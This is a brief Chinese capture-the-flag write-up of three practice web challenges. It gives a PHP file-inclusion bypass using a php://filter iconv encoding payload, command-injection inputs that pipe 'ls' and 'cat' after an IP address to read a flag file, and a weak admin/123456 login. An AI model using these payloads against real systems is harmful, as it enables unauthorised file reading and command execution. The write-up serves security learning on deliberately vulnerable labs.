攻防世界web篇(五)
文件包含
<?php highlight_file(__FILE__); include("./check.php"); if(isset($_GET['filename'])){ $filename = $_GET['filename']; include($filename); } ?>
首先尝试测试
经过尝试后发现read被ban掉了,这里参考了一下官方的wp
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
…
\具体支持的编码可见php官方文档
\https://www.php.net/manual/zh/mbstring.supported-encodings.php
利用iconv进行编码
/?filename=php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php
command_execution
127.0.0.1 |ls /home
127.0.0.1 | cat /home/flag.txt
weak_auth
小宁写了一个登陆验证页面,随手就设了一个密码。
账号密码admin/123456
